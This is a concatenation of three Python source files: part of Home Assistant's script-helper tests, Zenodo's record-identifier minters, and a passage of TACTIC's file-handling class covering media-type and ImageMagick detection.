hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 0
async def test_wait_template_not_schedule(hass):
"""Test the wait template with correct condition."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event},
{"wait_template": "{{ states.switch.test.state == 'on' }}"},
{"event": event},
]
)
script_obj = script.Script(hass, sequence)
hass.states.async_set("switch.test", "on")
await script_obj.async_run()
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 2
@pytest.mark.parametrize(
"continue_on_timeout,n_events", [(False, 0), (True, 1), (None, 1)]
)
async def test_wait_template_timeout(hass, mock_timeout, continue_on_timeout, n_events):
"""Test the wait template, halt on timeout."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = [
{"wait_template": "{{ states.switch.test.state == 'off' }}", "timeout": 5},
{"event": event},
]
if continue_on_timeout is not None:
sequence[0]["continue_on_timeout"] = continue_on_timeout
sequence = cv.SCRIPT_SCHEMA(sequence)
script_obj = script.Script(hass, sequence)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 0
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=5))
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == n_events
async def test_wait_template_variables(hass):
"""Test the wait template with variables."""
sequence = cv.SCRIPT_SCHEMA({"wait_template": "{{ is_state(data, 'off') }}"})
script_obj = script.Script(hass, sequence)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run({"data": "switch.test"}))
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
async def test_condition_basic(hass):
"""Test if we can use conditions in a script."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event},
{
"condition": "template",
"value_template": "{{ states.test.entity.state == 'hello' }}",
},
{"event": event},
]
)
script_obj = script.Script(hass, sequence)
hass.states.async_set("test.entity", "hello")
await script_obj.async_run()
await hass.async_block_till_done()
assert len(events) == 2
hass.states.async_set("test.entity", "goodbye")
await script_obj.async_run()
await hass.async_block_till_done()
assert len(events) == 3
@patch("homeassistant.helpers.script.condition.async_from_config")
async def test_condition_created_once(async_from_config, hass):
"""Test that the conditions do not get created multiple times."""
sequence = cv.SCRIPT_SCHEMA(
{
"condition": "template",
"value_template": '{{ states.test.entity.state == "hello" }}',
}
)
script_obj = script.Script(hass, sequence, script_mode="parallel", max_runs=2)
async_from_config.reset_mock()
hass.states.async_set("test.entity", "hello")
await script_obj.async_run()
await script_obj.async_run()
await hass.async_block_till_done()
async_from_config.assert_called_once()
assert len(script_obj._config_cache) == 1
async def test_condition_all_cached(hass):
"""Test that multiple conditions get cached."""
sequence = cv.SCRIPT_SCHEMA(
[
{
"condition": "template",
"value_template": '{{ states.test.entity.state == "hello" }}',
},
{
"condition": "template",
"value_template": '{{ states.test.entity.state != "hello" }}',
},
]
)
script_obj = script.Script(hass, sequence)
hass.states.async_set("test.entity", "hello")
await script_obj.async_run()
await hass.async_block_till_done()
assert len(script_obj._config_cache) == 2
async def test_repeat_count(hass):
"""Test repeat action w/ count option."""
event = "test_event"
events = async_capture_events(hass, event)
count = 3
sequence = cv.SCRIPT_SCHEMA(
{
"repeat": {
"count": count,
"sequence": {
"event": event,
"event_data_template": {
"first": "{{ repeat.first }}",
"index": "{{ repeat.index }}",
"last": "{{ repeat.last }}",
},
},
}
}
)
script_obj = script.Script(hass, sequence)
await script_obj.async_run()
await hass.async_block_till_done()
assert len(events) == count
for index, event in enumerate(events):
assert event.data.get("first") == str(index == 0)
assert event.data.get("index") == str(index + 1)
assert event.data.get("last") == str(index == count - 1)
@pytest.mark.parametrize("condition", ["while", "until"])
async def test_repeat_conditional(hass, condition):
"""Test repeat action w/ while option."""
event = "test_event"
events = async_capture_events(hass, event)
count = 3
sequence = {
"repeat": {
"sequence": [
{
"event": event,
"event_data_template": {
"first": "{{ repeat.first }}",
"index": "{{ repeat.index }}",
},
},
{"wait_template": "{{ is_state('sensor.test', 'next') }}"},
{"wait_template": "{{ not is_state('sensor.test', 'next') }}"},
],
}
}
if condition == "while":
sequence["repeat"]["while"] = {
"condition": "template",
"value_template": "{{ not is_state('sensor.test', 'done') }}",
}
else:
sequence["repeat"]["until"] = {
"condition": "template",
"value_template": "{{ is_state('sensor.test', 'done') }}",
}
script_obj = script.Script(hass, cv.SCRIPT_SCHEMA(sequence))
wait_started = async_watch_for_action(script_obj, "wait")
hass.states.async_set("sensor.test", "1")
hass.async_create_task(script_obj.async_run())
try:
for index in range(2, count + 1):
await asyncio.wait_for(wait_started.wait(), 1)
wait_started.clear()
hass.states.async_set("sensor.test", "next")
await asyncio.wait_for(wait_started.wait(), 1)
wait_started.clear()
hass.states.async_set("sensor.test", index)
await asyncio.wait_for(wait_started.wait(), 1)
hass.states.async_set("sensor.test", "next")
await asyncio.wait_for(wait_started.wait(), 1)
wait_started.clear()
hass.states.async_set("sensor.test", "done")
await asyncio.wait_for(hass.async_block_till_done(), 1)
except asyncio.TimeoutError:
await script_obj.async_stop()
raise
assert len(events) == count
for index, event in enumerate(events):
assert event.data.get("first") == str(index == 0)
assert event.data.get("index") == str(index + 1)
@pytest.mark.parametrize("condition", ["while", "until"])
async def test_repeat_var_in_condition(hass, condition):
"""Test repeat action w/ while option."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = {"repeat": {"sequence": {"event": event}}}
if condition == "while":
sequence["repeat"]["while"] = {
"condition": "template",
"value_template": "{{ repeat.index <= 2 }}",
}
else:
sequence["repeat"]["until"] = {
"condition": "template",
"value_template": "{{ repeat.index == 2 }}",
}
script_obj = script.Script(hass, cv.SCRIPT_SCHEMA(sequence))
with mock.patch(
"homeassistant.helpers.condition._LOGGER.error",
side_effect=AssertionError("Template Error"),
):
await script_obj.async_run()
assert len(events) == 2
async def test_repeat_nested(hass):
"""Test nested repeats."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{
"event": event,
"event_data_template": {
"repeat": "{{ None if repeat is not defined else repeat }}"
},
},
{
"repeat": {
"count": 2,
"sequence": [
{
"event": event,
"event_data_template": {
"first": "{{ repeat.first }}",
"index": "{{ repeat.index }}",
"last": "{{ repeat.last }}",
},
},
{
"repeat": {
"count": 2,
"sequence": {
"event": event,
"event_data_template": {
"first": "{{ repeat.first }}",
"index": "{{ repeat.index }}",
"last": "{{ repeat.last }}",
},
},
}
},
{
"event": event,
"event_data_template": {
"first": "{{ repeat.first }}",
"index": "{{ repeat.index }}",
"last": "{{ repeat.last }}",
},
},
],
}
},
{
"event": event,
"event_data_template": {
"repeat": "{{ None if repeat is not defined else repeat }}"
},
},
]
)
script_obj = script.Script(hass, sequence, "test script")
with mock.patch(
"homeassistant.helpers.condition._LOGGER.error",
side_effect=AssertionError("Template Error"),
):
await script_obj.async_run()
assert len(events) == 10
assert events[0].data == {"repeat": "None"}
assert events[-1].data == {"repeat": "None"}
for index, result in enumerate(
(
("True", "1", "False"),
("True", "1", "False"),
("False", "2", "True"),
("True", "1", "False"),
("False", "2", "True"),
("True", "1", "False"),
("False", "2", "True"),
("False", "2", "True"),
),
1,
):
assert events[index].data == {
"first": result[0],
"index": result[1],
"last": result[2],
}
@pytest.mark.parametrize("var,result", [(1, "first"), (2, "second"), (3, "default")])
async def test_choose(hass, var, result):
"""Test choose action."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
{
"choose": [
{
"conditions": {
"condition": "template",
"value_template": "{{ var == 1 }}",
},
"sequence": {"event": event, "event_data": {"choice": "first"}},
},
{
"conditions": {
"condition": "template",
"value_template": "{{ var == 2 }}",
},
"sequence": {"event": event, "event_data": {"choice": "second"}},
},
],
"default": {"event": event, "event_data": {"choice": "default"}},
}
)
script_obj = script.Script(hass, sequence)
await script_obj.async_run({"var": var})
await hass.async_block_till_done()
assert len(events) == 1
assert events[0].data["choice"] == result
@pytest.mark.parametrize(
"action",
[
{"repeat": {"count": 1, "sequence": {"event": "abc"}}},
{"choose": {"conditions": [], "sequence": {"event": "abc"}}},
{"choose": [], "default": {"event": "abc"}},
],
)
async def test_multiple_runs_repeat_choose(hass, caplog, action):
"""Test parallel runs with repeat & choose actions & max_runs > default."""
max_runs = script.DEFAULT_MAX + 1
script_obj = script.Script(
hass, cv.SCRIPT_SCHEMA(action), script_mode="parallel", max_runs=max_runs
)
events = async_capture_events(hass, "abc")
for _ in range(max_runs):
hass.async_create_task(script_obj.async_run())
await hass.async_block_till_done()
assert "WARNING" not in caplog.text
assert "ERROR" not in caplog.text
assert len(events) == max_runs
async def test_last_triggered(hass):
"""Test the last_triggered."""
event = "test_event"
sequence = cv.SCRIPT_SCHEMA({"event": event})
script_obj = script.Script(hass, sequence)
assert script_obj.last_triggered is None
time = dt_util.utcnow()
with mock.patch("homeassistant.helpers.script.utcnow", return_value=time):
await script_obj.async_run()
await hass.async_block_till_done()
assert script_obj.last_triggered == time
async def test_propagate_error_service_not_found(hass):
"""Test that a script aborts when a service is not found."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA([{"service": "test.script"}, {"event": event}])
script_obj = script.Script(hass, sequence)
with pytest.raises(exceptions.ServiceNotFound):
await script_obj.async_run()
assert len(events) == 0
assert not script_obj.is_running
async def test_propagate_error_invalid_service_data(hass):
"""Test that a script aborts when we send invalid service data."""
event = "test_event"
events = async_capture_events(hass, event)
calls = async_mock_service(hass, "test", "script", vol.Schema({"text": str}))
sequence = cv.SCRIPT_SCHEMA(
[{"service": "test.script", "data": {"text": 1}}, {"event": event}]
)
script_obj = script.Script(hass, sequence)
with pytest.raises(vol.Invalid):
await script_obj.async_run()
assert len(events) == 0
assert len(calls) == 0
assert not script_obj.is_running
async def test_propagate_error_service_exception(hass):
"""Test that a script aborts when a service throws an exception."""
event = "test_event"
events = async_capture_events(hass, event)
@callback
def record_call(service):
"""Add recorded event to set."""
raise ValueError("BROKEN")
hass.services.async_register("test", "script", record_call)
sequence = cv.SCRIPT_SCHEMA([{"service": "test.script"}, {"event": event}])
script_obj = script.Script(hass, sequence)
with pytest.raises(ValueError):
await script_obj.async_run()
assert len(events) == 0
assert not script_obj.is_running
async def test_referenced_entities(hass):
"""Test referenced entities."""
script_obj = script.Script(
hass,
cv.SCRIPT_SCHEMA(
[
{
"service": "test.script",
"data": {"entity_id": "light.service_not_list"},
},
{
"service": "test.script",
"data": {"entity_id": ["light.service_list"]},
},
{
"condition": "state",
"entity_id": "sensor.condition",
"state": "100",
},
{"service": "test.script", "data": {"without": "entity_id"}},
{"scene": "scene.hello"},
{"event": "test_event"},
{"delay": "{{ delay_period }}"},
]
),
)
assert script_obj.referenced_entities == {
"light.service_not_list",
"light.service_list",
"sensor.condition",
"scene.hello",
}
# Test we cache results.
assert script_obj.referenced_entities is script_obj.referenced_entities
async def test_referenced_devices(hass):
"""Test referenced entities."""
script_obj = script.Script(
hass,
cv.SCRIPT_SCHEMA(
[
{"domain": "light", "device_id": "script-dev-id"},
{
"condition": "device",
"device_id": "condition-dev-id",
"domain": "switch",
},
]
),
)
assert script_obj.referenced_devices == {"script-dev-id", "condition-dev-id"}
# Test we cache results.
assert script_obj.referenced_devices is script_obj.referenced_devices
@contextmanager
def does_not_raise():
"""Indicate no exception is expected."""
yield
async def test_script_mode_single(hass, caplog):
"""Test overlapping runs with max_runs = 1."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event, "event_data": {"value": 1}},
{"wait_template": "{{ states.switch.test.state == 'off' }}"},
{"event": event, "event_data": {"value": 2}},
]
)
script_obj = script.Script(hass, sequence)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 1
assert events[0].data["value"] == 1
# Start second run of script while first run is suspended in wait_template.
await script_obj.async_run()
assert "Already running" in caplog.text
assert script_obj.is_running
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 2
assert events[1].data["value"] == 2
@pytest.mark.parametrize(
"script_mode,messages,last_events",
[("restart", ["Restarting"], [2]), ("parallel", [], [2, 2])],
)
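# 'restart' cancels the first run (logging "Restarting") so only the second run
# finishes; 'parallel' lets both runs complete.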
async def test_script_mode_2(hass, caplog, script_mode, messages, last_events):
"""Test overlapping runs with max_runs > 1."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event, "event_data": {"value": 1}},
{"wait_template": "{{ states.switch.test.state == 'off' }}"},
{"event": event, "event_data": {"value": 2}},
]
)
logger = logging.getLogger("TEST")
max_runs = 1 if script_mode == "restart" else 2
script_obj = script.Script(
hass, sequence, script_mode=script_mode, max_runs=max_runs, logger=logger
)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 1
assert events[0].data["value"] == 1
# Start second run of script while first run is suspended in wait_template.
wait_started_flag.clear()
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 2
assert events[1].data["value"] == 1
assert all(
any(
rec.levelname == "INFO"
and rec.name == "TEST"
and message in rec.message
for rec in caplog.records
)
for message in messages
)
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.states.async_set("switch.test", "off")
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 2 + len(last_events)
for idx, value in enumerate(last_events, start=2):
assert events[idx].data["value"] == value
async def test_script_mode_queued(hass):
"""Test overlapping runs with script_mode = 'queued' & max_runs > 1."""
event = "test_event"
events = async_capture_events(hass, event)
sequence = cv.SCRIPT_SCHEMA(
[
{"event": event, "event_data": {"value": 1}},
{"wait_template": "{{ states.switch.test.state == 'off' }}"},
{"event": event, "event_data": {"value": 2}},
{"wait_template": "{{ states.switch.test.state == 'on' }}"},
]
)
logger = logging.getLogger("TEST")
script_obj = script.Script(
hass, sequence, script_mode="queued", max_runs=2, logger=logger
)
wait_started_flag = async_watch_for_action(script_obj, "wait")
try:
hass.states.async_set("switch.test", "on")
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 1
assert events[0].data["value"] == 1
# Start second run of script while first run is suspended in wait_template.
# This second run should not start until the first run has finished.
hass.async_create_task(script_obj.async_run())
await asyncio.sleep(0)
assert script_obj.is_running
assert len(events) == 1
wait_started_flag.clear()
hass.states.async_set("switch.test", "off")
await asyncio.wait_for(wait_started_flag.wait(), 1)
assert script_obj.is_running
assert len(events) == 2
assert events[1].data["value"] == 2
wait_started_flag.clear()
hass.states.async_set("switch.test", "on")
await asyncio.wait_for(wait_started_flag.wait(), 1)
await asyncio.sleep(0)
assert script_obj.is_running
assert len(events) == 3
assert events[2].data["value"] == 1
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.states.async_set("switch.test", "off")
await asyncio.sleep(0)
hass.states.async_set("switch.test", "on")
await hass.async_block_till_done()
assert not script_obj.is_running
assert len(events) == 4
assert events[3].data["value"] == 2
async def test_script_logging(hass, caplog):
"""Test script logging."""
script_obj = script.Script(hass, [], "Script with % Name")
script_obj._log("Test message with name %s", 1)
assert "Script with % Name: Test message with name 1" in caplog.text
script_obj = script.Script(hass, [])
script_obj._log("Test message without name %s", 2)
assert "Test message without name 2" in caplog.text
async def test_shutdown_at(hass, caplog):
"""Test stopping scripts at shutdown."""
delay_alias = "delay step"
sequence = cv.SCRIPT_SCHEMA({"delay": {"seconds": 120}, "alias": delay_alias})
script_obj = script.Script(hass, sequence, "test script")
delay_started_flag = async_watch_for_action(script_obj, delay_alias)
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
assert script_obj.last_action == delay_alias
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
hass.bus.async_fire("homeassistant_stop")
await hass.async_block_till_done()
assert not script_obj.is_running
assert "Stopping scripts running at shutdown: test script" in caplog.text
async def test_shutdown_after(hass, caplog):
"""Test stopping scripts at shutdown."""
delay_alias = "delay step"
sequence = cv.SCRIPT_SCHEMA({"delay": {"seconds": 120}, "alias": delay_alias})
script_obj = script.Script(hass, sequence, "test script")
delay_started_flag = async_watch_for_action(script_obj, delay_alias)
hass.state = CoreState.stopping
hass.bus.async_fire("homeassistant_stop")
await hass.async_block_till_done()
try:
hass.async_create_task(script_obj.async_run())
await asyncio.wait_for(delay_started_flag.wait(), 1)
assert script_obj.is_running
assert script_obj.last_action == delay_alias
except (AssertionError, asyncio.TimeoutError):
await script_obj.async_stop()
raise
else:
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=60))
await hass.async_block_till_done()
assert not script_obj.is_running
assert (
"Stopping scripts running too long after shutdown: test script"
in caplog.text
)
async def test_update_logger(hass, caplog):
"""Test updating logger."""
sequence = cv.SCRIPT_SCHEMA({"event": "test_event"})
script_obj = script.Script(hass, sequence)
await script_obj.async_run()
await hass.async_block_till_done()
assert script.__name__ in caplog.text
log_name = "testing.123"
script_obj.update_logger(logging.getLogger(log_name))
await script_obj.async_run()
await hass.async_block_till_done()
assert log_name in caplog.text
| pschmitt/home-assistant | tests/helpers/test_script.py | Python | apache-2.0 | 46,540 | 0.000645 |
# -*- coding: utf-8 -*-
#
# This file is part of Zenodo.
# Copyright (C) 2016 CERN.
#
# Zenodo is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Zenodo is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Zenodo; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Persistent identifier minters."""
from __future__ import absolute_import
from invenio_pidstore.models import PersistentIdentifier, PIDStatus, \
RecordIdentifier
def zenodo_concept_recid_minter(record_uuid=None, data=None):
"""Mint the Concept RECID.
Reserves the Concept RECID for the record.
"""
parent_id = RecordIdentifier.next()
conceptrecid = PersistentIdentifier.create(
pid_type='recid',
pid_value=str(parent_id),
status=PIDStatus.RESERVED,
)
data['conceptrecid'] = conceptrecid.pid_value
return conceptrecid
def zenodo_deposit_minter(record_uuid, data):
"""Mint the DEPID, and reserve the Concept RECID and RECID PIDs."""
if 'conceptrecid' not in data:
zenodo_concept_recid_minter(data=data)
recid = zenodo_reserved_record_minter(data=data)
# Create depid with same pid_value of the recid
depid = PersistentIdentifier.create(
'depid',
str(recid.pid_value),
object_type='rec',
object_uuid=record_uuid,
status=PIDStatus.REGISTERED,
)
data.update({
'_deposit': {
'id': depid.pid_value,
'status': 'draft',
},
})
return depid
def zenodo_reserved_record_minter(record_uuid=None, data=None):
"""Reserve a recid."""
id_ = RecordIdentifier.next()
recid = PersistentIdentifier.create(
'recid', id_, status=PIDStatus.RESERVED
)
data['recid'] = recid.pid_value
return recid
| jainaman224/zenodo | zenodo/modules/deposit/minters.py | Python | gpl-2.0 | 2,471 | 0 |
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ["FileException", "File", "FileAccess", "IconCreator", "FileGroup", "FileRange"]
from pyasm.common import Common, Xml, TacticException, Environment, System, Config
from pyasm.search import *
from project import Project
from subprocess import Popen, PIPE
import sys, os, string, re, stat, glob
try:
#import Image
from PIL import Image
# Test to see if imaging actually works
import _imaging
HAS_PIL = True
except:
HAS_PIL = False
try:
import Image
# Test to see if imaging actually works
import _imaging
HAS_PIL = True
except:
HAS_PIL = False
# check if imagemagick is installed, and find exe if possible
convert_exe = ''
HAS_IMAGE_MAGICK = False
if os.name == "nt":
# prefer direct exe to not confuse with other convert.exe present on nt systems
convert_exe_list = glob.glob('C:\\Program Files\\ImageMagick*')
for exe in convert_exe_list:
try:
convert_process = Popen(['%s\\convert.exe'%exe,'-version'], stdout=PIPE, stderr=PIPE)
convert_return,convert_err = convert_process.communicate()
if 'ImageMagick' in convert_return:
convert_exe = '%s\\convert.exe'%exe
HAS_IMAGE_MAGICK = True
except:
print "Running %s failed" %exe
if not convert_exe_list:
# IM might not be in Program Files but may still be in PATH
try:
convert_process = Popen(['convert','-version'], stdout=PIPE, stderr=PIPE)
convert_return,convert_err = convert_process.communicate()
if 'ImageMagick' in convert_return:
convert_exe = 'convert'
HAS_IMAGE_MAGICK = True
except:
pass
else:
# in other systems (e.g. unix) 'convert' is expected to be in PATH
try:
convert_process = Popen(['convert','-version'], stdout=PIPE, stderr=PIPE)
convert_return,convert_err = convert_process.communicate()
if 'ImageMagick' in convert_return:
convert_exe = 'convert'
HAS_IMAGE_MAGICK = True
except:
pass
if Common.which("ffprobe"):
HAS_FFMPEG = True
else:
HAS_FFMPEG = False
import subprocess
class FileException(TacticException):
pass
class File(SObject):
NORMAL_EXT = ['max','ma','xls' ,'xlsx', 'doc', 'docx','txt', 'rtf', 'odt','fla','psd', 'xsi', 'scn', 'hip', 'xml','eani','pdf', 'fbx',
'gz', 'zip', 'rar',
'ini', 'db', 'py', 'pyd', 'spt'
]
VIDEO_EXT = ['mov','wmv','mpg','mpeg','m1v','m2v','mp2','mp4','mpa','mpe','mp4','wma','asf','asx','avi','wax',
'wm','wvx','ogg','webm','mkv','m4v','mxf','f4v','rmvb']
IMAGE_EXT = ['jpg','png','tif','tiff','gif','dds','dcm']
SEARCH_TYPE = "sthpw/file"
BASE_TYPE_SEQ = "sequence"
BASE_TYPE_DIR = "directory"
BASE_TYPE_FILE = "file"
def get_code(my):
return my.get_value("code")
def get_file_name(my):
return my.get_value("file_name")
def get_file_range(my):
return my.get_value("file_range")
def get_type(my):
return my.get_value("type")
def get_media_type_by_path(cls, path):
tmp, ext = os.path.splitext(path)
ext = ext.lstrip(".")
ext = ext.lower()
if ext in File.VIDEO_EXT:
return "video"
elif ext in File.NORMAL_EXT:
return "document"
else:
return "image"
get_media_type_by_path = classmethod(get_media_type_by_path)
def get_sobject(my):
'''get the sobject associated with this file'''
search = Search(my.get_value("search_type"))
search.add_id_filter(my.get_value("search_id"))
sobject = search.get_sobject()
return sobject
def get_full_file_name(my):
'''Gets the full file name. This is the same as get_file_name'''
return my.get_file_name()
def get_lib_dir(my,snapshot=None):
'''go through the stored snapshot_code to get the actual path'''
code = my.get_value("snapshot_code")
from snapshot import Snapshot
snapshot = Snapshot.get_by_code(code)
return snapshot.get_lib_dir()
def get_env_dir(my,snapshot=None):
'''go through the stored snapshot_code to get the actual path'''
code = my.get_value("snapshot_code")
from snapshot import Snapshot
snapshot = Snapshot.get_by_code(code)
return snapshot.get_env_dir()
def get_web_dir(my,snapshot=None):
'''go through the stored snapshot_code to get the actual path'''
code = my.get_value("snapshot_code")
from snapshot import Snapshot
snapshot = Snapshot.get_by_code(code)
return snapshot.get_web_dir()
def get_lib_path(my):
filename = my.get_full_file_name()
return "%s/%s" % (my.get_lib_dir(), filename)
def get_env_path(my):
'''path beginning with $TACTIC_ASSET_DIR'''
filename = my.get_full_file_name()
return "%s/%s" % (my.get_env_dir(), filename)
def get_web_path(my):
filename = my.get_full_file_name()
return "%s/%s" % (my.get_web_dir(), filename)
##################
# Static Methods
##################
"""
    # DEPRECATED
PADDING = 10
    # DEPRECATED
def add_file_code(file_path, file_code):
ext = ".".join( File.get_extensions(file_path) )
padded_id = str(file_code).zfill(File.PADDING)
file_path = file_path.replace(".%s" % ext, "_%s.%s" % (padded_id, ext) )
return file_path
add_file_code = staticmethod(add_file_code)
    # DEPRECATED
def remove_file_code(file_path):
new_path = re.compile(r'_(\w{%s})\.' % File.PADDING).sub(".", file_path)
return new_path
remove_file_code = staticmethod(remove_file_code)
    # DEPRECATED
def extract_file_code(file_path):
p = re.compile(r'_(\w{%s})\.' % File.PADDING)
m = p.search(file_path)
if not m:
return 0
groups = m.groups()
if not groups:
return 0
else:
file_code = groups[0]
# make sure there are only alpha/numberic characters
if file_code.find("_") != -1:
return 0
# make sure the first 3 are numeric
if not re.match('^\d{3}\w+$', file_code):
return 0
# strip out the leading zeros
return file_code.lstrip("0")
extract_file_code = staticmethod(extract_file_code)
    # DEPRECATED
def extract_file_path(file_path):
'''return file path without the unique id'''
p = re.compile(r'_(\w{%s})\.' % File.PADDING)
m = p.search(file_path)
if not m:
return file_path
groups = m.groups()
if not groups:
return file_path
else:
new_path = file_path.replace("_%s" % groups[0], "")
return new_path
extract_file_path = staticmethod(extract_file_path)
    # DEPRECATED
def has_file_code(file_path):
file_code = File.extract_file_code(file_path)
if file_code == 0:
return False
else:
return True
has_file_code = staticmethod(has_file_code)
"""
def get_extension(file_path):
'''get only the final extension'''
parts = os.path.basename(file_path).split(".")
ext = parts[len(parts)-1]
return ext
get_extension = staticmethod(get_extension)
def get_extensions(file_path):
'''get all of the extensions after the first .'''
parts = os.path.basename(file_path).split(".")
ext = parts[1:len(parts)]
return ext
get_extensions = staticmethod(get_extensions)
def get_by_snapshot(cls, snapshot, file_type=None):
xml = snapshot.get_xml_value("snapshot")
file_codes = xml.get_values("snapshot/file/@file_code")
search = Search( cls.SEARCH_TYPE)
search.add_filters("code", file_codes)
if file_type:
search.add_filter("type", file_type)
return search.get_sobjects()
get_by_snapshot = classmethod(get_by_snapshot)
def get_by_filename(cls, filename, skip_id=None, padding=0):
search = Search(cls.SEARCH_TYPE)
# if this is a file range then convert file name to padding
# FIXME: need some way to know what and where the padding is
if padding:
filename = re.sub("(.*\.)(\d+)", r"\1####", filename)
search.add_filter("file_name", filename)
project_code = Project.get_project_code()
search.add_filter("project_code", project_code)
if skip_id:
search.add_where('id != %s'%skip_id)
return search.get_sobject()
get_by_filename = classmethod(get_by_filename)
def get_by_snapshots(cls, snapshots, file_type=None):
all_file_codes = []
for snapshot in snapshots:
xml = snapshot.get_xml_value("snapshot")
file_codes = xml.get_values("snapshot/file/@file_code")
all_file_codes.extend(file_codes)
search = Search( cls.SEARCH_TYPE)
search.add_filters("code", all_file_codes)
if file_type:
search.add_filter("type", file_type)
files = search.get_sobjects()
# cache these
for file in files:
key = "%s|%s" % (file.get_search_type(),file.get_code())
SObject.cache_sobject(key, file)
return files
get_by_snapshots = classmethod(get_by_snapshots)
# DEPRECATED
"""
def get_by_path(path):
file_code = File.extract_file_code(path)
if file_code == 0:
return None
search = Search(File.SEARCH_TYPE)
search.add_id_filter(file_code)
file = search.get_sobject()
return file
get_by_path = staticmethod(get_by_path)
"""
def get_by_path(path):
asset_dir = Environment.get_asset_dir()
path = path.replace("%s/" % asset_dir, "")
relative_dir = os.path.dirname(path)
file_name = os.path.basename(path)
# NOTE: this does not work with base_dir_alias
search = Search("sthpw/file")
search.add_filter("relative_dir", relative_dir)
search.add_filter("file_name", file_name)
sobject = search.get_sobject()
return sobject
get_by_path = staticmethod(get_by_path)
def create( file_path, search_type, search_id, file_type=None, requires_file=True, st_size=None, repo_type=None, search_code = None):
exists = os.path.exists(file_path)
isdir = os.path.isdir(file_path)
if requires_file and not os.path.exists(file_path):
raise FileException("File '%s' does not exist" % file_path)
file_name = os.path.basename(file_path)
file = File(File.SEARCH_TYPE)
file.set_value("file_name", file_name)
file.set_value("search_type", search_type)
if search_code:
file.set_value("search_code", search_code)
# MongoDb
if search_id and isinstance(search_id, int):
file.set_value("search_id", search_id)
if file_type:
file.set_value("type", file_type)
if isdir:
file.set_value("base_type", File.BASE_TYPE_DIR)
else:
file.set_value("base_type", File.BASE_TYPE_FILE)
project = Project.get()
file.set_value("project_code", project.get_code())
if exists:
if isdir:
dir_info = Common.get_dir_info(file_path)
size = dir_info.get("size")
file.set_value("st_size", size)
else:
from stat import ST_SIZE
size = os.stat(file_path)[ST_SIZE]
file.set_value("st_size", size)
elif st_size != None:
file.set_value("st_size", st_size)
if repo_type:
file.set_value("repo_type", repo_type)
file.commit()
return file
create = staticmethod(create)
def makedirs(dir, mode=None):
'''wrapper to mkdirs in case it ever needs to be overridden'''
print "DEPRECATED: use System().makedirs()"
return System().makedirs(dir,mode)
makedirs = staticmethod(makedirs)
def get_filesystem_name(name, strict=True):
'''takes a name and converts it to a name that can be saved in
the filesystem.'''
filename = name
filename = filename.replace("/", "__")
filename = filename.replace("|", "__")
filename = filename.replace(":", "__")
filename = filename.replace("?", "__")
filename = filename.replace("=", "__")
if strict:
filename = filename.replace(" ", "_")
filename_base, ext = os.path.splitext(filename)
ext = string.lower(ext)
filename = "%s%s" % (filename_base, ext)
return filename
